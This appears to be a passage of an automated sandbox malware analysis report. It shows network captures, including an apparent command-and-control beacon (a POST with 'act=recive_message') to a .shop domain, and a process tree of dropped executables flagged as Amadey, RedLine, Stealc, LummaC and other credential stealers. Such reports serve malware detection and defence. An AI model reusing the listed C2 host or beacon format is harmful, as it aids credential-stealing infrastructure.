2024-09-03 15:14:37 UTC	816	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-03 15:14:37 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-09-03 15:14:37 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 76 73 5f 57 6f 44 39 45 39 6c 73 35 65 34 32 53 72 67 4f 78 30 46 65 41 4b 36 41 4b 50 72 65 34 4a 72 49 6d 6d 64 41 46 52 5a 38 2d 31 37 32 35 33 37 36 34 37 37 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 Data Ascii: <input type="hidden" name="atok" value="vs_WoD9E9ls5e42SrgOx0FeAK6AKPre4JrImmdAFRZ8-1725376477-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-09-03 15:14:37 UTC	851	IN	Data Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
2024-09-03 15:14:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.8	49854	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:43 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=vs_WoD9E9ls5e42SrgOx0FeAK6AKPre4JrImmdAFRZ8-1725376477-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: locatedblsoqp.shop
2024-09-03 15:14:43 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 31 54 4f 35 41 2d 2d 51 58 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=y1TO5A--QX1&j=
2024-09-03 15:14:43 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=41fo3ctv7gvc73dr4e6vik5kj9; expires=Sat, 28 Dec 2024 09:01:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWwlpVUHR6kFjdnDyAwz%2BYe4og%2FIY%2FulgCVbwPkjCx8y94w%2BTCmgHO5SvZQn50dJkY0KNQ7WCRfcDgkVvrpxGr3MzG2CPwZxYSHlvrS4mQ2EbuOkMq1JmIRgbNXWYsCs1ja5PGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b0eb0c191845-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:43 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:12:14
Start date:	03/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x800000
File size:	1'934'336 bytes
MD5 hash:	884CDB86A958AE71754D1BA5C04A4F11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1500851216.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1460552733.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:12:16
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x1b0000
File size:	1'934'336 bytes
MD5 hash:	884CDB86A958AE71754D1BA5C04A4F11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1529134155.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1484616344.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 57%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:13:00
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x1b0000
File size:	1'934'336 bytes
MD5 hash:	884CDB86A958AE71754D1BA5C04A4F11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.1914720636.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:13:04
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"
Imagebase:	0xc90000
File size:	322'048 bytes
MD5 hash:	6134586375C01F97F8777BAE1BF5ED98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.1959861483.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:13:04
Start date:	03/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7194a0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:13:04
Start date:	03/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2106632894.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:13:08
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"
Imagebase:	0x9c0000
File size:	1'104'936 bytes
MD5 hash:	8E74497AFF3B9D2DDB7E7F819DFC69BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:13:08
Start date:	03/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:13:09
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe"
Imagebase:	0xa10000
File size:	557'056 bytes
MD5 hash:	88367533C12315805C059E688E7CDFE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.2003484391.0000000000A12000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: ditekSHen
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:13:09
Start date:	03/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:13:09
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe"
Imagebase:	0x4a0000
File size:	311'296 bytes
MD5 hash:	30F46F4476CDC27691C7FDAD1C255037
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000000.2004024984.00000000004A2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:13:12
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Imagebase:	0x470000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.2028680920.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:13:12
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Imagebase:	0x620000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2038154443.0000000000621000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000000.2035548380.0000000000621000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:13:13
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Imagebase:	0x620000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.2041814507.0000000000621000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2746002669.0000000000621000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	11:13:14
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0x9e0000
File size:	192'000 bytes
MD5 hash:	7A02AA17200AEAC25A375F290A4B4C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:13:23
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe"
Imagebase:	0x400000
File size:	6'662'059 bytes
MD5 hash:	06B767BF2A7DEAC9B9E524C5B6986BF7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	11:13:28
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000191001\1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000191001\1.exe"
Imagebase:	0x400000
File size:	3'639'176 bytes
MD5 hash:	17D51083CCB2B20074B1DC2CAC5BEA36
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000018.00000002.2259797317.0000000003029000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:13:34
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:13:38
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe"
Imagebase:	0x400000
File size:	6'647'095 bytes
MD5 hash:	7ADB5E2E04A5DCADA12236D363F6A4C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 46%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	11:13:45
Start date:	03/09/2024
Path:	C:\Users\user\1000238002\Amadeus.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000238002\Amadeus.exe"
Imagebase:	0xd00000
File size:	5'562'368 bytes
MD5 hash:	36A627B26FAE167E6009B4950FF15805
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000001B.00000002.2612049284.000000000196C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:13:47
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000241001\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000241001\build.exe"
Imagebase:	0xbe0000
File size:	423'424 bytes
MD5 hash:	05C1BAAA01BD0AA0CCB5EC1C43A7D853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001C.00000000.2385848983.0000000000BE2000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: ditekSHen
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:13:47
Start date:	03/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:13:50
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe"
Imagebase:	0x1b0000
File size:	45'056 bytes
MD5 hash:	B73CF29C0EA647C353E4771F0697C41F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.2560282937.000000001CDE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.2518264534.00000000125A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:13:52
Start date:	03/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Imagebase:	0x560000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.2745835536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	11:13:53
Start date:	03/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
